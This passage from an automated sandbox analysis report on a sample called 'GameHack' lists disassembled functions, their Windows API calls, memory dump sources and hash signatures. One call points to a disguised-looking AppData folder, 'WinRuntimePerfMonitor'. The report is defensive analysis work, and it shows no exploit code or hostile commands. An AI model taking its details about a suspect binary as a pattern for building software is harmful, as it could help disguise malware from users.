                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 09666f0ebef55652f2402372d231796b89be93a857859cba9b691f192b516840
                                      • Instruction ID: 920f96df3f8919d01b69327d543cc58fa0bcbcc744f17f670e3b5c7b33cc7b5d
                                      • Opcode Fuzzy Hash: 09666f0ebef55652f2402372d231796b89be93a857859cba9b691f192b516840
                                      • Instruction Fuzzy Hash: 8DA0129126D0467C300871036C02C7A024CC0C0B10330551AF00AA008454404C046431
                                      Function 00EEDACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDAB2
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 9dae8a88c0346cc74dc483887d4a872895a55dc3bc778d1e281e4d7994d931d6
                                      • Instruction ID: 920f96df3f8919d01b69327d543cc58fa0bcbcc744f17f670e3b5c7b33cc7b5d
                                      • Opcode Fuzzy Hash: 9dae8a88c0346cc74dc483887d4a872895a55dc3bc778d1e281e4d7994d931d6
                                      • Instruction Fuzzy Hash: 8DA0129126D0467C300871036C02C7A024CC0C0B10330551AF00AA008454404C046431
                                      Function 00EEDAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDAB2
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: b9ab61cb7f7ce2ae1667b9e20aa4d5bc6f8d165b9e3799049c2f74dac0e7f046
                                      • Instruction ID: 920f96df3f8919d01b69327d543cc58fa0bcbcc744f17f670e3b5c7b33cc7b5d
                                      • Opcode Fuzzy Hash: b9ab61cb7f7ce2ae1667b9e20aa4d5bc6f8d165b9e3799049c2f74dac0e7f046
                                      • Instruction Fuzzy Hash: 8DA0129126D0467C300871036C02C7A024CC0C0B10330551AF00AA008454404C046431
                                      Function 00EEDAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDAB2
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: cef848f847b5d7db2672dcf4151135de34b36449e50502bbc31ec5ff6e5120e1
                                      • Instruction ID: 8d42af4c73e413504ed5ec484704fad2d89a084442780c2c2ea5ecd1f4c931fc
                                      • Opcode Fuzzy Hash: cef848f847b5d7db2672dcf4151135de34b36449e50502bbc31ec5ff6e5120e1
                                      • Instruction Fuzzy Hash: B8A0129136D4453C3008B103AC02C7A024CD0C0B11330511AF00AB008454404C046431
                                      Function 00EEDBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDBD5
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 71b2121e59914296c1ee09f3fb571752f1410ad071236fa6f014ee2027ad3b06
                                      • Instruction ID: 3d52361a50fd35bbfcca09d2ca52f92ec3a980b65eab4d350f3b239e1f43f3e7
                                      • Opcode Fuzzy Hash: 71b2121e59914296c1ee09f3fb571752f1410ad071236fa6f014ee2027ad3b06
                                      • Instruction Fuzzy Hash: C1A0029537D54B7C710852526D17D76025CD4C4B513316519F506B41C16A505C456431
                                      Function 00EEDC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDC36
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 182b6382f1844ae3db27580dfd2e7b9413d2bb99cf33905fd174b7d57152fc07
                                      • Instruction ID: 8ca4586091d0d7428e6630eba5a5c660c90dd814b3addad5715faa6004edd54b
                                      • Opcode Fuzzy Hash: 182b6382f1844ae3db27580dfd2e7b9413d2bb99cf33905fd174b7d57152fc07
                                      • Instruction Fuzzy Hash: 9AA0029566D5467C710C61526D16D7A425CD4C4B913305919F506B41D155805C45A431
                                      Function 00EEDC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDC36
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: e5f0f7a453d520c114d103361976760ccd9497db8eb4a379d9005c99676ec37f
                                      • Instruction ID: 8ca4586091d0d7428e6630eba5a5c660c90dd814b3addad5715faa6004edd54b
                                      • Opcode Fuzzy Hash: e5f0f7a453d520c114d103361976760ccd9497db8eb4a379d9005c99676ec37f
                                      • Instruction Fuzzy Hash: 9AA0029566D5467C710C61526D16D7A425CD4C4B913305919F506B41D155805C45A431
                                      Function 00EEDC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDBD5
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: e4f655b0d84492034e38fd9c5582c5f2cd7e7d546322278026966a6782ffedf2
                                      • Instruction ID: 3d52361a50fd35bbfcca09d2ca52f92ec3a980b65eab4d350f3b239e1f43f3e7
                                      • Opcode Fuzzy Hash: e4f655b0d84492034e38fd9c5582c5f2cd7e7d546322278026966a6782ffedf2
                                      • Instruction Fuzzy Hash: C1A0029537D54B7C710852526D17D76025CD4C4B513316519F506B41C16A505C456431
                                      Function 00EEDC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDBD5
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 9cbf584db84597844e3e5e409797bdb0ecb8006083618660acd0230169e413a4
                                      • Instruction ID: 3d52361a50fd35bbfcca09d2ca52f92ec3a980b65eab4d350f3b239e1f43f3e7
                                      • Opcode Fuzzy Hash: 9cbf584db84597844e3e5e409797bdb0ecb8006083618660acd0230169e413a4
                                      • Instruction Fuzzy Hash: C1A0029537D54B7C710852526D17D76025CD4C4B513316519F506B41C16A505C456431
                                      Function 00EEDC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDBD5
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 8584737d83efd80d9de73027a038a8305a7e56161ad8a19d991db8039cbcfeb2
                                      • Instruction ID: 3d52361a50fd35bbfcca09d2ca52f92ec3a980b65eab4d350f3b239e1f43f3e7
                                      • Opcode Fuzzy Hash: 8584737d83efd80d9de73027a038a8305a7e56161ad8a19d991db8039cbcfeb2
                                      • Instruction Fuzzy Hash: C1A0029537D54B7C710852526D17D76025CD4C4B513316519F506B41C16A505C456431
                                      Function 00ED9EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetEndOfFile.KERNELBASE(?,00ED9104,?,?,-00001964), ref: 00ED9EC2
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: File
                                      • String ID:
                                      • API String ID: 749574446-0
                                      • Opcode ID: fa8f84aa66f11296f11c47b750b439804a88686892252f9596164228c243f6cf
                                      • Instruction ID: d3c852118fb3fbe2f664a6675080dbf6b2137d25f2489a00a22b1732678d8c28
                                      • Opcode Fuzzy Hash: fa8f84aa66f11296f11c47b750b439804a88686892252f9596164228c243f6cf
                                      • Instruction Fuzzy Hash: E0B011300A200A8ACE002B30CC088283A28FA2230A30082A0A002CA0A0CB22C002AA00
                                      Function 00EEA322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetCurrentDirectoryW.KERNELBASE(?,00EEA587,C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor,00000000,00F1946A,00000006), ref: 00EEA326
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory
                                      • String ID:
                                      • API String ID: 1611563598-0
                                      • Opcode ID: fe5c77835397e66bb7e2a3b1bc64c9399571c956cef0232ec7c8e3dfe75950db
                                      • Instruction ID: fdab742739d2cff93f027a402ec78ecafa7fcba97c4b35ad1fe20e9e70880226
                                      • Opcode Fuzzy Hash: fe5c77835397e66bb7e2a3b1bc64c9399571c956cef0232ec7c8e3dfe75950db
                                      • Instruction Fuzzy Hash: B1A0123019400A56CA000B30CD09C1576546760702F0086207002C00A0CB308814B500
                                      Function 00ED96D0 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • CloseHandle.KERNELBASE(000000FF,?,?,00ED968F,?,?,?,?,00F01FA1,000000FF), ref: 00ED96EB
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: b18edf08e5ee7dff4715aaadbb3150f4af67ba74bdee159142b5c1227c6b949d
                                      • Instruction ID: c71090569a7bd30b20b638e15dc8ded042ff8db6c5da259def6e0ddcf1ca74b8
                                      • Opcode Fuzzy Hash: b18edf08e5ee7dff4715aaadbb3150f4af67ba74bdee159142b5c1227c6b949d
                                      • Instruction Fuzzy Hash: B5F05E30556B048FDB308E24D949792B7E8EB12729F04AB1F90F7636E1D761A98E9F00

                                      Non-executed Functions

                                      Function 00EEB8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ED130B: GetDlgItem.USER32(00000000,00003021), ref: 00ED134F
                                        • Part of subcall function 00ED130B: SetWindowTextW.USER32(00000000,00F035B4), ref: 00ED1365
                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00EEB971
                                      • EndDialog.USER32(?,00000006), ref: 00EEB984
                                      • GetDlgItem.USER32(?,0000006C), ref: 00EEB9A0
                                      • SetFocus.USER32(00000000), ref: 00EEB9A7
                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 00EEB9E1
                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00EEBA18
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00EEBA2E
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EEBA4C
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EEBA5C
                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00EEBA78
                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00EEBA94
                                      • _swprintf.LIBCMT ref: 00EEBAC4
                                        • Part of subcall function 00ED400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00ED401D
                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00EEBAD7
                                      • FindClose.KERNEL32(00000000), ref: 00EEBADE
                                      • _swprintf.LIBCMT ref: 00EEBB37
                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 00EEBB4A
                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00EEBB67
                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00EEBB87
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EEBB97
                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00EEBBB1
                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00EEBBC9
                                      • _swprintf.LIBCMT ref: 00EEBBF5
                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00EEBC08
                                      • _swprintf.LIBCMT ref: 00EEBC5C
                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 00EEBC6F
                                        • Part of subcall function 00EEA63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00EEA662
                                        • Part of subcall function 00EEA63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00F0E600,?,?), ref: 00EEA6B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                      • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                      • API String ID: 797121971-1840816070
                                      • Opcode ID: 7a67513c682efc448aea3a1ee9fb13ee86c6dbd55bbbf434e1c17b3917d7bf1a
                                      • Instruction ID: 75c6b517279e17bd7557fb4bf8eafd1274c7f980a7814d727a0618b54b392f79
                                      • Opcode Fuzzy Hash: 7a67513c682efc448aea3a1ee9fb13ee86c6dbd55bbbf434e1c17b3917d7bf1a
                                      • Instruction Fuzzy Hash: A391C3B214838CBBD6319BA1DD49FFBB7ECEB89704F001819B749E2081DB71A6059762
                                      Function 00EDDA98 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236COMMON
                                      Download Yara Rule
                                      APIs
                                      • _swprintf.LIBCMT ref: 00EDDABE
                                        • Part of subcall function 00ED400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00ED401D
                                        • Part of subcall function 00EE1596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00F10EE8,00000200,00EDD202,00000000,?,00000050,00F10EE8), ref: 00EE15B3
                                      • _strlen.LIBCMT ref: 00EDDADF
                                      • SetDlgItemTextW.USER32(?,00F0E154,?), ref: 00EDDB3F
                                      • GetWindowRect.USER32(?,?), ref: 00EDDB79
                                      • GetClientRect.USER32(?,?), ref: 00EDDB85
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EDDC25
                                      • GetWindowRect.USER32(?,?), ref: 00EDDC52
                                      • SetWindowTextW.USER32(?,?), ref: 00EDDC95
                                      • GetSystemMetrics.USER32(00000008), ref: 00EDDC9D
                                      • GetWindow.USER32(?,00000005), ref: 00EDDCA8
